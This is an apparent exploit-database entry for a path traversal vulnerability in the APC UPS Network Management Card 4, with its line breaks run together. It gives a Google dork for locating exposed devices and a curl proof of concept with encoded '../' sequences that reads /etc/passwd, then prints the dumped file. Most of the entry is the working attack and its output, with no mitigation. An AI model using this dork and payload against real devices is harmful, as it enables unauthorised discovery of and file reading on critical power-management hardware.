UPS Network Management Card 4 Path Traversal

# Exploit Title: UPS Network Management Card 4 - Path Traversal# Google Dork: inurl:nmc inurl:logon.htm# Date: 2023-12-19# Exploit Author: Víctor García# Vendor Homepage: https://www.apc.com/# Version: 4# Tested on: Kali Linux# CVE: N/A# PoC:curl -khttps://10.10.10.10/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswdroot:x:0:0:root:/home/root:/bin/shdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shdhcp:x:997:997::/var/run/dhcp:/bin/falsemessagebus:x:998:998::/var/lib/dbus:/bin/falsemosquitto:x:999:999::/home/mosquitto:/bin/falsenobody:x:65534:65534:nobody:/nonexistent:/bin/sh